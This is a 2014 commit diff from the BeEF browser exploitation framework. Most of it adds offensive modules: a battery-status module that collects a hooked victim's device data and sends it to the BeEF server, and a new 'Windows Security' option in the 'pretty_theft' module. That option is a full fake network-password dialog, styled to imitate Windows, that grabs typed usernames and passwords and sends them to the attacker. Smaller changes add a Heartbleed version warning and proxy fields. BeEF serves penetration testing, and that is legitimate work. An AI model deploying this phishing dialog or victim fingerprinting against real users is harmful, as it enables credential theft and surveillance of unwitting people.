Merge remote-tracking branch 'origin/master'

2014-04-14 11:48:23 +02:00
parent 940b03e249 78a0c689be
commit f2c83ced4d
8 changed files with 115 additions and 8 deletions
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -119,7 +119,7 @@ module BeEF
          if using_proxy == true
            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
            proxy_log_string = "#{zombie.ip} is using a proxy"
-            unless proxy_clients.nil?
+            unless proxy_clients.empty?
              BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
              proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
            end
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -108,6 +108,11 @@ module BeEF
              @rack_app)

          if @configuration.get('beef.http.https.enable') == true
+            openssl_version = OpenSSL::OPENSSL_VERSION
+            if openssl_version =~ / 1\.0\.1([a-f])/
+              print_error "Warning: #{openssl_version} is vulnerable to Heartbleed (CVE-2014-0160)."
+              print_more "Upgrade OpenSSL to version 1.0.1g or newer."
+            end
            @http_server.ssl = true
            @http_server.ssl_options = {:private_key_file => $root_dir + "/" + @configuration.get('beef.http.https.key'),
                                      :cert_chain_file => $root_dir + "/" + @configuration.get('beef.http.https.cert'),
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -72,6 +72,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
        ['Browser', 'Browser Language',   'BrowserLanguage'],
        ['Browser', 'Browser Platform',   'BrowserPlatform'],
        ['Browser', 'Browser Plugins',    'BrowserPlugins'],
+        ['Browser', 'Using Proxy',        'UsingProxy'],
+        ['Browser', 'Proxy Client',       'ProxyClient'],
+        ['Browser', 'Proxy Server',       'ProxyServer'],
        ['Browser', 'Window Size',        'WindowSize'],

        # Browser Components
--- a/modules/host/get_battery_status/command.js
+++ b/modules/host/get_battery_status/command.js
@@ -0,0 +1,19 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+beef.execute(function() {
+    var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;
+
+    if (!battery) {
+       beef.net.send("<%= @command_url %>", <%= @command_id %>, "Unable to get battery status");
+    }
+
+    var chargingStatus = battery.charging;
+    var batteryLevel = battery.level * 100 + "%";
+    var chargingTime = battery.chargingTime;
+    var dischargingTime = battery.dischargingTime;
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "chargingStatus=" + chargingStatus + "&batteryLevel=" + batteryLevel + "&chargingTime=" + chargingTime + "&dischargingTime=" + dischargingTime);
+});
--- a/modules/host/get_battery_status/config.yaml
+++ b/modules/host/get_battery_status/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        get_battery_status:
+            enable: true
+            category: "Host"
+            name: "Get Battery Status"
+            description: "Get informations of the victim current battery status"
+            authors: ["ecneladis"]
+            target:
+                working: ["FF"]
+                not_working: ["All"]
--- a/modules/host/get_battery_status/module.rb
+++ b/modules/host/get_battery_status/module.rb
@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_battery_status < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['chargingStatus'] = @datastore['chargingStatus']
+    content['batteryLevel'] = @datastore['batteryLevel']
+    content['chargingTime'] = @datastore['chargingTime']
+    content['dischargingTime'] = @datastore['dischargingTime']
+    save content
+  end
+
+end
--- a/modules/social_engineering/pretty_theft/command.js
+++ b/modules/social_engineering/pretty_theft/command.js
@@ -77,9 +77,9 @@ beef.execute(function() {

 	// Check whether the user has entered a user/pass and pressed ok
 	function checker(){
-		uname1 = document.body.lastChild.getElementsByTagName("input")[0].value;
-		pass1 = document.body.lastChild.getElementsByTagName("input")[1].value;
-		valcheck = document.body.lastChild.getElementsByTagName("input")[3].value;
+		uname1 = document.getElementById("uname").value;
+		pass1 = document.getElementById("pass").value;
+		valcheck = document.getElementById("buttonpress").value;
 		
 		if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") {
 			// Join user/pass and send to attacker
@@ -94,9 +94,9 @@ beef.execute(function() {
 			$j('#darkenScreenObject').remove();

 		}else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){
-		// If user has not entered any data reset button
-		document.body.lastChild.getElementsByTagName("input")[3].value = "false";
-		alert("Please enter a valid username and password.");		
+			// If user has not entered any data, reset button
+			document.body.lastChild.getElementById("buttonpress").value = "false";
+			alert("Please enter a valid username and password.");		
 		}
 	}

@@ -163,6 +163,51 @@ beef.execute(function() {
 		credgrabber = setInterval(checker,1000);
 	}

+	// Windows floating div
+	function windows() {
+		sneakydiv = document.createElement('div');
+                sneakydiv.setAttribute('id', 'popup');
+                sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:#ffffff;border-radius:6px;');
+                document.body.appendChild(sneakydiv);
+
+                // Set appearance using styles, maybe cleaner way to do this with CSS block?
+
+		// Set window border
+		var edgeborder = 'style="border:1px #000000 solid;border-radius:6px;"';
+		var windowborder  = 'style="width:400px;border: 7px #CFE7FE solid;border-radius:6px;"';
+
+		var windowmain    = 'style="border:1px #000000 solid;"';
+
+		var titlebarstyle = 'style="background:#CFE7FE;height:19px;font-size:12px;font-family:Segoe UI;"';
+		var titlebartext = 'Windows Security';
+
+		var promptstyle = 'style="height:40px;"';
+		var titlestyle = 'style="align:left;font-size:14px;font-family:Segoe UI;margin:10px 15px;line-height:100%;color:0042CE;"';
+		var title = 'Enter Network Password';
+		var bodystyle = 'style="align:left;font-size:11px;font-family:Segoe UI;margin:10px 15px;line-height:170%;"';
+		var body = 'Enter your password to connect to the server';
+		var dividestyle = 'style="border-bottom:1px solid #DFDFDF;height:1px;width:92%;margin-left:auto;margin-right:auto;"';
+
+		var tablestyle = 'style="background:#CFE7FE;width:90%;margin-left:auto;margin-right:auto;border:1px solid #84ACDD;border-radius:6px;height:87px"';
+		var logobox = 'style="border:4px #84ACDD solid;border-radius:7px;height:45px;width:45px;background:#ffffff"';
+		var logo = 'style="border:1px #000000 solid;height:43px;width:42px;background:#CFE7FE;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#EEF2F4, endColorstr=#CCD8DF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFE7FE));background: -moz-linear-gradient(top,  #EEF2F4,  #CCD8DF);"';
+
+		var inputboxstyle = 'style="width:140px;font-size:11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#666666;color:#000000;border-radius:3px;"';
+
+		var credstextstyle = 'style="font-size:11px;font-family:Segoe UI;"';
+
+		var buttonstyle   = 'style="font-size: 13px;background:#069;color:#000000;border: 1px #29447e solid;padding: 3px 3px 3px 3px;margin-right:5px;border-radius:5px;width:70px;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#ffffff, endColorstr=#CFCFCF);background: -webkit-gradient(linear, left top, left bottom, from(#ffffff), to(#CFCFCF));background: -moz-linear-gradient(top,  #ffffff,  #CFCFCF);"';
+		var buttonLabel  = '<input type="button" name="ok" value="OK" id="ok" ' +buttonstyle+ ' onClick="document.getElementById(\'buttonpress\').value=\'true\'" onMouseOver="this.bgColor=\'#00CC00\'" onMouseOut="this.bgColor=\'#009900\'" bgColor=#009900>';
+
+		var bbarstyle     = 'style="background-color:#F0F0F0;padding:8px;text-align:right;border-top: 1px solid #DFDFDF;height:28px;margin-top:10px;"';
+
+		// Build page including styles
+		sneakydiv.innerHTML= '<div id="edge" '+edgeborder+'><div id="window_container" '+windowborder+ '><div id="title_bar" ' +titlebarstyle+ '>' +titlebartext+ '</div><div id="windowmain" ' +windowmain+ '><div id="prompt" '+promptstyle+'><p><span ' +titlestyle+ '>' +title+ '</span><br/><span ' +bodystyle+ '>' + body + '</span></div><div id="divide" ' +dividestyle+ '></div></p><table ' +tablestyle+ '><tr><td rowspan="3" width=75px align="center"><div id="logobox" ' +logobox+ '><div id="logo" ' +logo+ '></div></div></td><td align="left"><input type="text" id="uname" placeholder="User name" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td align="left"><input type="password" id="pass" name="pass" placeholder="Password" onkeydown="if (event.keyCode == 13) document.getElementById(\'buttonpress\').value=\'true\'"' +inputboxstyle+ '/></td></tr><tr><td><input type="checkbox"><span ' +credstextstyle+ '>Remember my credentials</span></td></tr></table>' + '<div id="bottom_bar" ' +bbarstyle+ '>' +buttonLabel+ '<input type="hidden" id="buttonpress" name="buttonpress" value="false"/></div></div></div></div>';
+
+		// Repeatedly check if button has been pressed
+		credgrabber = setInterval(checker,1000);
+	}
+
 	// YouTube floating div
 	function youtube() {

@@ -252,6 +297,8 @@ beef.execute(function() {
 			facebook(); break;
 		case "LinkedIn":
 			linkedin(); break;
+		case "Windows":
+			windows(); break;
 		case "YouTube":
 			youtube();  break;
 		case "Yammer":
--- a/modules/social_engineering/pretty_theft/module.rb
+++ b/modules/social_engineering/pretty_theft/module.rb
@@ -10,7 +10,7 @@ class Pretty_theft < BeEF::Core::Command
    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
    logo_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
    return [
-		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
+		{'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Windows'],['YouTube'],['Yammer'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
       		
 		{'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },